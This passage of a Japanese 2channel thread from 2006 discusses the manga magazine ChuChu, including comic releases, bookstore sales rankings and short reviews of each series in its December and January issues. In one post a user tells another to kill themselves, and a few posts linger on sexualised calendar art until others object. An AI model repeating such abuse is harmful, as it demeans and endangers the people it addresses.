え?!本当に29だったんですか!ビックリ!
く〜…、30きらら最高!←変態

131 :花と名無しさん:2006/11/01(水) 10:39:45 ID:???O
さくら2巻ゲトー
今回のおまけマンガはモンキャン執筆中の裏話〜


132 :花と名無しさん:2006/11/01(水) 21:26:16 ID:???0
まりんちゃんの「ピー を見せて」って何か元になる実話がありそーな気がする。
アシさんと一緒にお風呂に入ったとか。

133 :花と名無しさん:2006/11/02(木) 19:30:30 ID:7AbRfoop0
どうだろね

保守age

134 :花と名無しさん:2006/11/02(木) 20:27:01 ID:???O
七島たんの単行本ゲット。
好きだった読切りが収録されてなかった。
アンケ葉書出そう。

135 :花と名無しさん:2006/11/02(木) 22:36:04 ID:???0
>>134
自分も昨日買った。
今はチュチュ読んでないのでまき戻しは初めて読んだけど
彼氏と仲直りする話だと思ってずっと読んでたから
最後ポカーンとなった。
まあ絵が好きで買ったからいんだけど。

136 :花と名無しさん:2006/11/03(金) 08:58:26 ID:???0
今更気付いたけどバイト制服デザインコンテストのイラストってきららさんだったのね。
本人には悪いけど本来の自分の絵柄より真似をしているこっちの絵柄の方がとっつきやすい。

137 :花と名無しさん:2006/11/03(金) 18:19:04 ID:???0
ばやしさんと七島のコミックス、カバー絵が被ってるな

138 :花と名無しさん:2006/11/04(土) 16:12:48 ID:???0
ttp://yaplog.jp/s_paradise/archive/214
酔ってる高宮たん。
なんだか読んでてドキドキ。

139 :花と名無しさん:2006/11/04(土) 17:09:14 ID:???0
目がトローンとした高宮さんが目の前にいるみたいv

140 :花と名無しさん:2006/11/04(土) 17:13:27 ID:???0
ttp://nanowpage.web.fc2.com/makiutasya.html
圧巻。カラー作画過程。

141 :花と名無しさん:2006/11/09(木) 19:08:15 ID:???0
chuchuスレの皆様、宣伝失礼致します。  

第二回漫画最萌トーナメント一次予選開始(11/11(土)より)のお知らせに伺わせていただきました 10000キャラ以上が集う夢の祭典、
少女漫画関係からも複数キャラがエントリーされています、もし気が向かれた際にはお気軽にご参加いただければ幸いです
第二回漫画最萌トーナメントまとめサイトttp://max.45.kg/mangasaimoe/index.html 

142 :花と名無しさん:2006/11/09(木) 23:00:44 ID:???0
14組{{赤井姫香@モンスターキャンディー}}
20組{{楠葉@Black Mark}}
22組{{内田香美@内助のこーちゃん}}
31組{{桜井ひな@オンリー★わん!}}

143 :花と名無しさん:2006/11/10(金) 06:22:02 ID:svH8KYW00
16組 {{西園芽衣@アニコン}}
16組 {{天@ALMIGHTY×10}}
05組 {{中原さくら@さくら前線}}
14組 {{東雲真綾(まあち)@アニコン}}
16組 {{東森さん@FLY HIGH}}
16組 {{野代桜@週番ロマンス}}
18組 {{雅@チョコミントKISS}}
17組 {{山口実咲@今夜、晴れたら}}

144 :花と名無しさん:2006/11/10(金) 13:41:58 ID:???0
かわはらキャラがやたら多い件

145 :花と名無しさん:2006/11/10(金) 19:07:03 ID:???0
そもそも投票の仕方が分からない件

146 :花と名無しさん:2006/11/10(金) 20:22:56 ID:???0
名前書かれてもどこの誰だか分からないキャラが多すぎな件

147 :仲木戸ゆう ◆q9AzgpRwRQ :2006/11/10(金) 23:08:54 ID:A0/wmgd70
>>144
大ファンですから。

148 :花と名無しさん:2006/11/10(金) 23:31:23 ID:???0
>>147
そういえば、ゆきのんスレは元気かね?

149 :花と名無しさん:2006/11/11(土) 07:20:26 ID:???P
12月号掲載の「リヴリーアイランドちゅちゅオリジナル島」
について詳細分かった人は教えてくださーい。

150 :花と名無しさん:2006/11/13(月) 09:53:36 ID:DF9TSGwT0
ちょっと!あたしこんな小便臭い雑誌にゃー興味ねーんだけど。
リヴリーのちゅちゅオリジナル島ってのが12月号の特典で出るらしいの。
買った厨房はくわしく教えなさい?さー早くしな!まだー?

151 :花と名無しさん:2006/11/13(月) 10:33:58 ID:???O
結局NGはどっちが主人公とくっ付くんだろ?
先の見えにくい三角関係はハラハラするが。

152 :花と名無しさん:2006/11/13(月) 13:31:04 ID:???O
懸賞、うさみん以外の皆さん応募してみた。
うさみんごめんね。

153 :花と名無しさん:2006/11/13(月) 15:02:06 ID:???0
なっとくポンチの作者は病気だからしばらく休載なんだよ

154 :花と名無しさん:2006/11/13(月) 20:19:01 ID:???0
>>150
君は自害した方がいいと思うよ

155 :花と名無しさん:2006/11/14(火) 07:00:53 ID:???0
>>154
ワロタ
>153
しかし、無いと無いで何となくさむしいから不思議だな。
>151
それがいいんじゃね?しばらくはあのままでぶっ飛んでいて欲しい。
決まり始めて先が見えたらもうダメだ。

156 :花と名無しさん:2006/11/14(火) 14:17:03 ID:???O
Nパラは真尋で決まりでそ?
年賀状は真尋とのツーショットだし
真斗派な私にはショボーン……

157 :花と名無しさん:2006/11/14(火) 17:32:15 ID:???0
>>156
クリスマスは真斗だったじゃん

158 :花と名無しさん:2006/11/15(水) 12:46:04 ID:???0
>>156 2人とも似たような物じゃん

159 :花と名無しさん:2006/11/15(水) 15:35:50 ID:???O
先月クリスマスカード+今月年賀状で総計1万名当選らしいけど
内訳はどうなってんだろう?

160 :花と名無しさん:2006/11/15(水) 15:56:24 ID:???0
最新文教堂ランキング、ちょっと持ち直したか?
(11月15日更新)
13 (14) 1611111 ちゅちゅ 小学館 20061014 1189

創刊からの文教堂売上推移
1月号 ちゅちゅ 1693
2月号 ちゅちゅ 1472
3月号 ちゅちゅ 1341
4月号 ちゅちゅ 1292
5月号 ちゅちゅ 1294 
6月号 ちゅちゅ 1279
7月号 ちゅちゅ 1231
8月号 ちゅちゅ 1247
9月号 ちゅちゅ 1157
10月号 ちゅちゅ 1161
11月号 ちゅちゅ 1189

161 :花と名無しさん:2006/11/15(水) 16:49:03 ID:???0
>>160
誤差の範囲程度だな。 安定したと言える。

12月号はALが面白かった、いやマジで。
藪はいつものパターンで勝ちに行くらしいので別格扱いにしておこうと思う。
あの携帯のロゴはWillcomで、WS009KEだな。流石オタ作家。

さくら前線はちょっと目がデカくなっている気がするけど気のせいだと思いたい。
ちゅちゅ漫画救急室ってのはわらえんな、「作家ピーするニャぴーは要らぬ
「昔の作品」見せればいいつう法則だな。

陣名まい 行ったモン勝ち 面白すぎ。
あのテールッ娘って、たてロールッ娘だったのかいw
それと、白目規制をしたい、なんて恐ろしい娘!
裏表紙、ベストショットな広告。表紙、オタ向けだな……
次号新連載 高宮 くすりゆびひめ 期待。
ちゅちゅ漫画ゼミナール 銅賞一名佳作二名 努力賞五名
さて、何名生き残るのかな?

後は 
七島 B+ 中村 B- 白鳥 B 藤田 C++
宮脇 A- 姫川 B 宇佐美 A+ 

誌面全体が綺麗に纏まった感じだった号だったと思う。

162 :花と名無しさん:2006/11/15(水) 17:58:27 ID:FXtsCuo30
七島って病気だよな。


163 :花と名無しさん:2006/11/15(水) 18:26:20 ID:???0
うん、マンガ家という疾病だなw

コレに罹ると、ひたすら漫画を描きまくると言う。
主な過去における疾病者で重篤だったのは
手塚 横山等々だが、最近のクランケは症状が軽いという。

164 :花と名無しさん:2006/11/15(水) 21:53:54 ID:???0
12月号読んだ。
水都さん絵が荒れてきてるね。特にカラー。
人気はあるだろうから、少し休ませてあげて欲しい。

宇佐美は相変わらずな感じだったなぁ。
フキダシに対する作者突っ込みとか「オトモダチ」とか
なんかこうスッキリしないというか釈然としない不快感。

あとアンケートハガキはいい感じだったね。
ちゃおから1人召還するつもりのようだ。

165 :花と名無しさん:2006/11/15(水) 22:01:28 ID:???0
12月号天婦羅投下。こんなんでいいかね?<元の人

【表紙/やぶさん】
【恋が降る/やぶさん】
【さくら/ばやし】
【イタコ/笹木】
【Loveゲーム/七島】
【AL10/水都】
【世界一/さゆみん】
【行ったもん/陣名】
【KISS/白鳥】
【おまえは/にみ】
【NG/ゆきのん】
【メリクリ/姫川】
【ひとつ屋根/宇佐美】
【次回予告(高宮・杉山・新連載/かわはら・七瀬・読切)】

【付録/AL】

166 :花と名無しさん:2006/11/15(水) 22:02:13 ID:???0
>>164
> ちゃおから1人召還するつもりのようだ。
召喚魔法で誰か来るのかな……


167 :花と名無しさん:2006/11/16(木) 11:07:27 ID:???0
【表紙/やぶさん】 普通。
【恋が降る/やぶさん】 普通。
【さくら/ばやし】 面白い
【イタコ/笹木】  いつもと変わらん
【Loveゲーム/七島】 面白い
【AL10/水都】 普通
【世界一/さゆみん】 スルー
【行ったもん/陣名】 超オモレ
【KISS/白鳥】  スルー
【おまえは/にみ】 ツマンネ
【NG/ゆきのん】 オモレ
【メリクリ/姫川】 糞
【ひとつ屋根/宇佐美】 ツマンネ 
【次回予告(高宮・杉山・新連載/かわはら・七瀬・読切)】 かわはらさんと高宮さん楽しみ

【付録/AL】 メモ帳として使える。




168 :花と名無しさん:2006/11/16(木) 11:12:48 ID:???0
http://etc4.2ch.net/test/read.cgi/wcomic/1163150951/l50

キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

神キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

神キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

神キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

神キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

神キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

神キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

神キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

神キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

169 :花と名無しさん:2006/11/16(木) 12:38:18 ID:???0
せっかくなので天婦羅いただきます。ゴチ。

【表紙/やぶさん】 ベテランだけあって無難に仕上げてくれる。
【恋が降る/やぶさん】 予告見てからメガネとくっつく方向を、
 期待していたが、最終的には茶髪になるんだろうな。ちぇ。
【さくら/ばやし】 面白い。にみじゃなくさくらをカラー扉に
 した方がよかったんじゃないか。
【イタコ/笹木】 スルー。
【Loveゲーム/七島】 前回の連載より面白そう。
 男キャラも今のところまだいつものようにキモくない。
【AL10/水都】 なんか、もう、あんまり面白くないかも。
 ちゃお層の方がこういう話は向くんじゃないかね。
【世界一/さゆみん】 前のよりマシだけど、とってつけたかのように
 最後みんなくっつくあたりご都合主義ですな。
 当分出てこないで欲しいの2月号から連載かよ・・・orz
【行ったもん/陣名】 フツウ。
【KISS/白鳥】 イマイチ。
【おまえは/にみ】 にみにしちゃ面白い方じゃないか?絵はひどいが。
【NG/ゆきのん】 次号急展開ですかね?男のどっちかが死んだりしたら
 なかよしの料理漫画とかぶるな・・・。
【メリクリ/姫川】 話どうこうじゃなく絵がきもすぎて・・・。
【ひとつ屋根/宇佐美】 絵はヒドイし話もつまらんし、なぜ連載?
【次回予告(高宮・杉山・新連載/かわはら・七瀬・読切)】
 杉山さん、また一般人じゃない人に挑戦ですか。フツウでいいのに。

【付録/AL】 スルー。

余談:今月号、連載の最後のおまけページの読者からのカット葉書の
   枚数が人気に比例しているような気がした・・・。
   (ばやし7、水6、さゆ・ゆきのん5、うさみ・にみ3枚。)

170 :花と名無しさん:2006/11/16(木) 17:01:50 ID:???0
不覚にもにみの新作で萌えてしまった

171 :花と名無しさん:2006/11/16(木) 22:49:56 ID:???0
>>169
ちょっと突っ込ませてw
>【AL10/水都】 なんか、もう、あんまり面白くないかも。
>ちゃお層の方がこういう話は向くんじゃないかね。
だがそれがいい。

172 :花と名無しさん:2006/11/17(金) 05:11:17 ID:???0
てんぷらごちです。
【表紙/やぶさん】 かわいいね。
【恋が降る/やぶさん】 良さそう。
【さくら/ばやし】 面白い。

【Loveゲーム/七島】 面白い。
【AL10/水都】 面白い。
【世界一/さゆみん】 顔のゆがみが何とかなれば好きになれる。
【行ったもん/陣名】 毎回楽しく読ませてもらってます。
【KISS/白鳥】 絵が雑。未読だが好きじゃない。
【おまえは/にみ】 面白い。
【NG/ゆきのん】 面白いけどちょっと書き分けが。
【次回予告(高宮・杉山・新連載/かわはら・七瀬・読切)】 カッコの中の漫画家は個人的にみんな好き
なので楽しみ。

【付録/AL】 ノート使えるね。

173 :花と名無しさん:2006/11/17(金) 14:07:58 ID:???0
天麩羅ゴチ

【表紙/やぶさん】 可愛いんだけどアニメっぽすぎるかも
【恋が降る/やぶさん】 さくら系のシリアス純愛路線?いいねー
【さくら/ばやし】 こういう、つなぎみたいな回でも面白くていいな。
【イタコ/笹木】 スルー
【Loveゲーム/七島】 主人公が釣り目にならないように頑張ってるような気がする
【AL10/水都】 こういうとこで都合よく兄弟がでてくるあたりとかB級感つよすぎ
【世界一/さゆみん】 ご都合主義ラスト乙…
【行ったもん/陣名】 今回は比較的普通かな…
【KISS/白鳥】 主人公ウザ。同じ嘘つきなら前載ってた「うそつき咲ちゃん」のが断然いい
【おまえは/にみ】 殿の顔、もちっと「怖いけどよく見たらかっこいい」にして欲しかった
            キャラクターはツボなのになー
【NG/ゆきのん】 これがゆきのん節ってやつか。○○フラグですか?
【メリクリ/姫川】 目がすべる絵…内容といい40代が描いてるって言っても不思議じゃない。
【ひとつ屋根/宇佐美】 つまんない伏線の解消とご都合ラストのみでつまらなすぎだよ
【次回予告(高宮・杉山・新連載/かわはら・七瀬・読切)】
高宮さんには期待したい。杉山さんには今度こそいつ両思いになったか分かるようにしてほしい。
【付録/AL】 どうでもいい

174 :花と名無しさん:2006/11/17(金) 15:43:21 ID:???O
テンプラthx
【表紙】久しぶりのやぶ表紙(゚∀゚)キター
【恋が降る/やぶ】このジンクス、単にブルートレインが描きたくて作ったんじゃないよね?
【さくら/ばやし】武ちゃん激カワユス
【イタコ/笹木】会場にワラタ
【LOVEゲーム/七島】なかなか良さげ
【AL10/水都】登場人物増え杉…
【世界一/中村】華麗にスルー
【行ったもん/陣名】白眼顔がいい。陣名、なんて恐ろしい子…
【KISS/白鳥】絵は好きなんだけど白かった
【おまえは/にみ】殿可愛い
【NG/ゆきのん】次号楽しみ
【メリクリ/姫川】すごい服ww
【ひとつ屋根/宇佐美】華麗にスルー
【次回予告】カレンダー、陣名がイイ(゚∀゚)


175 :花と名無しさん:2006/11/17(金) 17:10:41 ID:???0
今月号のこのスレ的ChuChu賞は誰だっ!
AL

176 :花と名無しさん:2006/11/17(金) 17:36:03 ID:m1DANh6E0
AL10の主人公の兄弟の双子
めっちゃ好きや。

177 :花と名無しさん:2006/11/17(金) 17:49:27 ID:???0
【表紙/やぶさん】最近の中では1番良い。普通の漫画雑誌に戻った感じ…
【恋が降る/やぶさん】面白い。絵もうまい。
【さくら/ばやし】微妙…武は好き。
【イタコ/笹木】スルー
【Loveゲーム/七島】見事な四角関係?女の子はまぁまぁうまい、
というか良い印象だけど男が…
【AL10/水都】面白い。絵も雑だがうまいと思える。
【世界一/さゆみん】都合良すぎじゃないか?
【行ったもん/陣名】スルー
【KISS/白鳥】スルー。絵が嫌いだから。ついでに話も。
【おまえは/にみ】にみにしては良いんじゃない?底が知れてそう…
【NG/ゆきのん】まぁまぁ面白い。
【メリクリ/姫川】スルー。絵がきもい。名前も。
【ひとつ屋根/宇佐美】スルー。
【次回予告(高宮・杉山・新連載/かわはら・七瀬・読切)】高宮さんが
楽しみ

【付録/AL】漫画の絵付きって使えないよね。役に立たないよね…


178 :花と名無しさん:2006/11/18(土) 12:05:54 ID:???O
ちまちましてるヤツの最後の王子の台詞…

179 :花と名無しさん:2006/11/18(土) 15:20:28 ID:???O
>>175
今月もばやしさんが一番だったなぁ
毎月安定してる。流石というか。
長期連載陣を除いたら七島タソとにみタソが前作よりいい感じで健闘してるとオモ

180 :花と名無しさん:2006/11/18(土) 20:02:37 ID:???O
>175
姫川さんのお姫様抱っこの太股。

181 :花と名無しさん:2006/11/19(日) 19:23:53 ID:???0
>>180
貴様っ!絶対領域派かっ!          いい趣味をしているなw

182 :花と名無しさん:2006/11/21(火) 02:02:57 ID:???O
>>175
たてロール子のNEW髪型

あなたは?>>175

183 :花と名無しさん:2006/11/21(火) 02:25:26 ID:???0
>>182
わたしは、シラユキの出番更にupだな。        縦ロールッ娘も捨てがたいが。

184 :花と名無しさん:2006/11/26(日) 03:01:06 ID:???0
ChuChuって保守

185 :花と名無しさん:2006/11/28(火) 08:18:40 ID:???0
一応保守

186 :花と名無しさん:2006/11/28(火) 08:30:43 ID:???0
これまでのちゅちゅの連載の傾向を見ると、やや保守的な感じがする。
主力の人達は(おおばやし・水都・ゆきのん)みんな短期で終わってる。
いつでも畳めるようにしてるんじゃ・・ってちょっと不安になってみたり。

187 :花と名無しさん:2006/11/28(火) 08:32:02 ID:???0
あ、文章おかしいことに気づいた。
×主力の人達は(おおばやし・水都・ゆきのん)みんな短期で終わってる。
○主力の人達は(おおばやし・水都・ゆきのん)長く続いてるけど他の人たちは短期で終わってる。

188 :花と名無しさん:2006/11/28(火) 09:18:57 ID:???0
あくあタソをもうちょっと休ませてあげて欲しいナァ…

人を惹きつけるモノがあるからカラー仕事多いのだろうけど、
今月の付録の雑さを見ると、潰れたり落としたりが
起きるんじゃないかって心配になる。

がんばれちゅちゅ。

189 :花と名無しさん:2006/12/01(金) 01:58:19 ID:???0
明日あたりコミクスの早売り出てるかなぁ
アニコンとおくすりを購入予定

190 :花と名無しさん:2006/12/01(金) 15:14:47 ID:???0
おくすりゲット

191 :花と名無しさん:2006/12/01(金) 17:48:59 ID:???0
>190
Black mark は収録されてますか?

192 :花と名無しさん:2006/12/02(土) 11:02:10 ID:???0
本日漫画最萌出場中
20組{{楠葉@Black Mark}}

193 :花と名無しさん:2006/12/02(土) 12:58:46 ID:???O
やぶさんのサイトに「29日発売」ってあったから、
その日に買いに行った。
私もアニコンとおくすりをゲット。

194 :花と名無しさん:2006/12/03(日) 03:38:47 ID:???0
新連載48ページがネーム2日、原稿5日か・・・。

195 :花と名無しさん:2006/12/04(月) 07:48:54 ID:???0
ちょいと沈み過ぎ。月曜だしあげとこう。
>ChuChuコミクス
最初はどうなるかと思ったが順調みたいだね。
さて、アニコン買って帰るかw

196 :花と名無しさん:2006/12/04(月) 10:02:05 ID:???O
>>アニコン
途中までは好きだったので購入したが何度読んでもあの最終回はいただけないorz
個人的には潤とくっついて欲しかった。

そういや創刊1周年なので久しぶりに創刊号を読み返して見て思ったこと…








沙羅タソはどうなったんだろう……


197 :花と名無しさん:2006/12/04(月) 12:21:29 ID:???0
ていうか、アニコンのあの展開、とあるエロマンガとオチが似ててワロタ

198 :花と名無しさん:2006/12/04(月) 21:35:25 ID:???0
>>196
まひろタソ完全に無かった事にされてますなー
その辺がちょっといただけない

199 :花と名無しさん:2006/12/04(月) 21:59:05 ID:???O
潤はおねえさんとくっついてほしい

200 :花と名無しさん:2006/12/04(月) 23:49:07 ID:???0
まひろタン復活してなかったのか・・。
七島さんのコミクス買うくらいしかちゅちゅに関わってなかったけど
そりゃひどいな。

201 :花と名無しさん:2006/12/05(火) 00:00:28 ID:???0
>>196
うん、確かに投げたような開き直ったような感じだった。
じゃが、前後巻揃えて置かねばぁぁ、受け取れ本屋ー!つI
>沙羅タソはどうなったんだろう……
新生ChuChu、最初の黒歴史が刻まれたんだよ。
先生は栄えある最初の殉教者に ウウッツ。

202 :花と名無しさん:2006/12/05(火) 00:15:36 ID:???0
おくすりとやらは面白いのか?

203 :花と名無しさん:2006/12/05(火) 00:41:41 ID:???0
アニコン、コミックスではトーン貼り足してあった?
本誌では真っ白だったよね

204 :花と名無しさん:2006/12/05(火) 11:13:22 ID:???O
>202
ここでは評判いいけど
高宮サンは雰囲気漫画って感じで
飛び抜けて面白いわけではない気がする…。

>203
そんなに白かったイメージないけどなぁ

205 :花と名無しさん:2006/12/05(火) 16:21:54 ID:???0
白かったよ…背景無いし、大コマでスカスカ
新連載も警ドロのあたりも白いし、時間がないのかね

206 :花と名無しさん:2006/12/07(木) 05:06:22 ID:???0
http://myhome.cururu.jp/nagitti/blog
↑バカ

207 :花と名無しさん:2006/12/07(木) 10:29:40 ID:???0
>205
そりゃ〜冬コミがあるしね

208 :花と名無しさん:2006/12/07(木) 12:06:49 ID:???O
やぶさん冬コミでんの?

209 :花と名無しさん:2006/12/07(木) 14:33:38 ID:???0
デルンジャネーノ?

210 :花と名無しさん:2006/12/13(水) 11:08:25 ID:???O
カタログに出てなかった気がするけど…。
前に「コミケはしばらくお休みします」って
サイトで告知無かったっけ?

もっかいカタログ調べてきますノシ

211 :花と名無しさん:2006/12/14(木) 00:09:32 ID:Cig7vjNs0
なつみっち最高!

212 :花と名無しさん:2006/12/15(金) 10:47:41 ID:hWI0Bag7O
発売日すぎたし、あげ

213 :花と名無しさん:2006/12/15(金) 14:01:14 ID:???0
>>212 そして一寸評天ぷら投下
適当に整形してドゾー

ChuChu 1月号
【表紙・おおばやしさくら前線】 
【さくら前線・おおばやし】  
【クレージーLOVEゲーム・七島佳那】
【くすりゆびひめ・高宮智】 
【イタコちゃん・笹木竹丸】
【きみにあいたい(読み切り)・かわはらなつみ】
【ひとひらの恋いが振る・やぶうち優】 
【AL・水都あくあ】 
【アイノコトバ・杉山美和子】 
【陣名っちの行ったもの勝ち・陣名】
【NGパラダイス・宮脇ゆきの】 
【上手な恋のつくりかた・七瀬れい】
【おまえは絶対おれのもの・藤田にみ】 

【2月号予告】 
【新連載・PM5:00〜恋い墜ちる時〜・中村紗弓】
【W読み切り・失恋ダーリン☆方恋ハニー・こはく那音】 
【まじかる天使・姫川きらら】 

【総評】 

214 :花と名無しさん:2006/12/15(金) 14:01:55 ID:???0
>213
+【付録・カレンダー】




---
俺は明日か明後日ぐらいに。

215 :花と名無しさん:2006/12/15(金) 15:24:31 ID:???0
文教堂最新ランキング (12月15日更新)
18 (12) 1611112 ちゅちゅ 小学館 20061114 1074

創刊からの文教堂売上推移
1月号 ちゅちゅ 1693
2月号 ちゅちゅ 1472
3月号 ちゅちゅ 1341
4月号 ちゅちゅ 1292
5月号 ちゅちゅ 1294 
6月号 ちゅちゅ 1279
7月号 ちゅちゅ 1231
8月号 ちゅちゅ 1247
9月号 ちゅちゅ 1157
10月号 ちゅちゅ 1161
11月号 ちゅちゅ 1189
12月号 ちゅちゅ 1074


文教堂で1000切ったら存続ヤバイか?

216 :花と名無しさん:2006/12/15(金) 16:02:40 ID:???0
>>215
なんだってぇぇぇ―――!1月号のデーターがどうなるかだな。
それは別として、カレンダーはセンスいいよ。ちゃおのよりかは。

217 :花と名無しさん:2006/12/15(金) 16:31:28 ID:???O
12月号そんなに売り上げ悪かったのか

けど表紙やぶさんだったから
その手のとこではいつもより多かったと思いたい。

218 :花と名無しさん:2006/12/15(金) 22:19:38 ID:???O
素晴らしい、素晴らしい
カレンダーの7月
拝んじゃいますよ。
あぁ、陣名大名陣。

219 :花と名無しさん:2006/12/15(金) 22:23:30 ID:???O
わずかにずらしてるんですね
ブラの花柄の花の中心と乳首の位置を

あ、阿南先生もやってたな、ラブコミレッスンの扉絵で

220 :花と名無しさん:2006/12/15(金) 22:30:55 ID:???O
圧倒的ではないか、わが陣名は
力の入れ具合が他の先生方の2〜3倍違うんではないか?

221 :花と名無しさん:2006/12/15(金) 22:36:23 ID:???O
>220
勝手に自分のものにすんな!

222 :花と名無しさん:2006/12/15(金) 22:49:09 ID:???O
この図柄で時計作って〜

223 :花と名無しさん:2006/12/15(金) 23:27:11 ID:???O
ばやしさん手作りのパワーストーン
凄すぎる
つかなんて事やらせてんだ編集は

224 :花と名無しさん:2006/12/15(金) 23:36:34 ID:???0
>>220
陣名というペンネームに陣があるからな
はっ!まさか陣名の陣という布陣か!

12月の絵柄もよろしい。

225 :花と名無しさん:2006/12/16(土) 06:07:51 ID:???O
大明神だっけ?

226 :花と名無しさん:2006/12/16(土) 09:57:08 ID:???O
ビキニパンツの花びらが トローンとなまめかしいカーブを描いている ハァハァ
ブラの方のラインとは明らかに異なる

227 :花と名無しさん:2006/12/16(土) 10:35:06 ID:???0
はい、一番手>226 一寸評やれいw

228 :花と名無しさん:2006/12/16(土) 10:53:37 ID:???0
一応女性メインの板だしスレにも女性がいるしエロメインのスレじゃないんで
そういう話題を続けるのは控えてくれるか喪男版にスレたててやって下さい。

229 :花と名無しさん:2006/12/16(土) 11:42:43 ID:???0
>228
そりゃもっともです。
>>226
な、デリケートなんだからな暴走も程々にな。

230 :花と名無しさん:2006/12/16(土) 15:33:37 ID:???0
はい。すみません。

231 :花と名無しさん:2006/12/16(土) 23:28:35 ID:???0
わがままいってごめんね。
聞いてくれてありがとう。

232 :花と名無しさん:2006/12/16(土) 23:44:42 ID:???0
なんて心温まるスレだ

233 :花と名無しさん:2006/12/17(日) 09:52:00 ID:???0
そこで、一寸評ですよ? 

でも、ちゃんと全部頭から最後まで全作家の作品に目を通すとは考え辛いな。


234 :花と名無しさん:2006/12/19(火) 10:52:50 ID:???O
ラレッツをしようと思っているのだがなかなか今月号は全部読む気にならない・゚・。(ノд`)・゚・。
先月号はサクサク読めたのになぁ…
とりあえずさくらとひとひらは良かった。


235 :花と名無しさん:2006/12/19(火) 13:02:14 ID:???O
もう終わった話だが…
せかうたって、最後はご都合主義的ラストだったけど
もうちょっとひねった漫画だと
好きな男を取られた(取られた訳じゃないけど)夏緒が鬼と化して
様々な嫌がらせや黒魔術を施すんだよな…。

そういう展開になってたら
サユミソ好きになってたかもw

236 :花と名無しさん:2006/12/19(火) 23:50:30 ID:???0
そういう展開が用意されていたとしても編集部がダメ出しすると思うよ
小〜中学生向けだし、ちゅちゅは。

237 :花と名無しさん:2006/12/20(水) 00:11:10 ID:???0
見てるだけでいらいらする最初の作品よりはまだマシ?
ってことは成長してるのかな?
いつかさゆみん最高!深みがあって面白いって2chの評価も変わる日もくるのかな。


238 :花と名無しさん:2006/12/20(水) 00:57:47 ID:???0
いつかそうなるといいよなあ。

今回は杉山さんの新連載に驚いた。chuchuは純愛路線でいくものだと思ってたから
いや、大したことはないし、少コミほどにはならんだろうけどw
あと前も言われてたけど、高宮はローゼンが好きなんだろうな

239 :花と名無しさん:2006/12/20(水) 05:31:23 ID:???0
さゆみんはデッサンを頑張ってほしい

240 :花と名無しさん:2006/12/21(木) 01:01:31 ID:???O
杉山さんの新連載
今回のもつまらないというか、担当さん共々、雑誌の方向性見失ってないか?

少コミにいった方が絵もむいてる気がしてるよ…。

241 :花と名無しさん:2006/12/21(木) 04:14:18 ID:???O
>>236
「アリスにおまかせ」が連載できた雑誌の姉だから大丈夫w
まぁ、アリス当時と今じゃ
対象年齢も方向性も随分変わってきてるけど…。

242 :花と名無しさん:2006/12/21(木) 10:26:57 ID:???0
>>241
スレチだけどアリスは消防の私にはトラウマになったよw

243 :花と名無しさん:2006/12/21(木) 15:10:33 ID:???0
アリスがやってた頃は、自分まだ幼稚園前後だったなぁ
それからしばらくやめて、エンジェルリップ連載してる途中でまた買ってもらってた
懐かしい
アリスの付録とか、まだわずかにあったりする

244 :花と名無しさん:2006/12/21(木) 18:19:18 ID:???0
今回の高宮さんは真紅?外見込みだとゼロの使い魔っぽいですね
内容は杉山さんもだけど、微妙

なんか最近のちゅちゅって中身スカスカな気がする

245 :花と名無しさん:2006/12/21(木) 20:31:01 ID:???0
やぶの連載作のレベルが急落したのが大きな原因だな。

バヤシは頑張ってると思う。
性コミ作家は・・・見る気すらしない・・・。

246 :花と名無しさん:2006/12/21(木) 21:15:54 ID:???0
これからはゆきのんの時代

247 :花と名無しさん:2006/12/21(木) 21:19:00 ID:???0
そして高宮智の時代。

ChuChuの夜明けであった。

248 :花と名無しさん:2006/12/21(木) 21:42:55 ID:???O
さゆみんの時代だよ

249 :花と名無しさん:2006/12/21(木) 21:43:56 ID:???O
さゆみんの時代だよ

250 :花と名無しさん:2006/12/21(木) 22:13:06 ID:???0
さゆみん本人乙
二回言うな

251 :花と名無しさん:2006/12/21(木) 22:33:27 ID:???0
提示報告 ν速板が先日の鯖移転港時によりanimeデレクトリに放り込まれたため、
その余波で鯖のレスポンスが極めて悪くなる場合があります(もし同じ鯖であったらの話)
また、先日の工事で、大規模に鯖が更新された模様で、
まだシステムの絞り込みが足りない模様です。

故に書き込みに失敗しました等の表示が出る可能性が高いです。
で、そのOrder失敗の傾向として顕著なのは、Apache内部の遅延処理によって、
書き込みOrderがスレに遅れて反映される場合で、二重に反映される(描き込まれる)事です。
(トランザクション処理の失敗・みずほ事件と同じ)みなさま注意しましょう。

>>250 運用板ぐらい見ろ

252 :花と名無しさん:2006/12/21(木) 23:57:08 ID:???0
>>249
いやいや、那音たんの時代ですよ。

253 :花と名無しさん:2006/12/22(金) 00:57:01 ID:???0
うぜぇ

254 :花と名無しさん:2006/12/22(金) 01:06:29 ID:???0
うたう
ぜったい
ぇれぇ声で

255 :花と名無しさん:2006/12/22(金) 01:41:42 ID:???0
>>254
何がしたいのwww

256 :花と名無しさん:2006/12/22(金) 07:06:31 ID:???0
>>255





257 :花と名無しさん:2006/12/22(金) 11:50:59 ID:???O
テンプラゴチです。
【表紙/ばやし】去年の創刊号を意識した構図かな?
【さくら/ばやし】安定良作。武ちゃん激カワユス
【クレゲー/七島】微妙。ヒロインが独り突っ走ってて読者がおいてきぼり感
【くすり/高宮】微妙。前作、前々作の方が好き。
【イタコ/笹木】最終回乙。眼鏡をとったら髪がwwフイタ
【きみに/かわはら】まあまあ。写メが良かった。
【ひとひら/やぶ】良作。1話目より良かった。今後に期待。
【AL/水都】登場人物が多くてチト疲れる
【アイノコトバ/杉山】男が性ゴミみたいで微妙、杉山さんの作品はコメディーの方が好きなのに…

つづく


258 :花と名無しさん:2006/12/22(金) 11:52:54 ID:???O
つづき

【行った勝ち/陣名】安定良作。担当さんに萌えた。ボールで跳ねる陣名さんもカワユス
【NG/宮脇】良作。そろそろクライマックスか?
【上手な/七瀬】普通。当て馬の女の子がなんで逃げたのかがよくわからん…
【おま俺/藤田】意外と良作だった。殿のバカっぷりが(゚∀゚)イイ!
【予告】みんなさゆみんに気を取られてるけど、何気に笹木さんも新連載な件
【付録】カレンダーはやっぱり陣名がサイコー
【総評】なんか読後の満足感がないのは、お気に入り作家の新連載が2本とも期待外れだったからか…
ガンガレ!


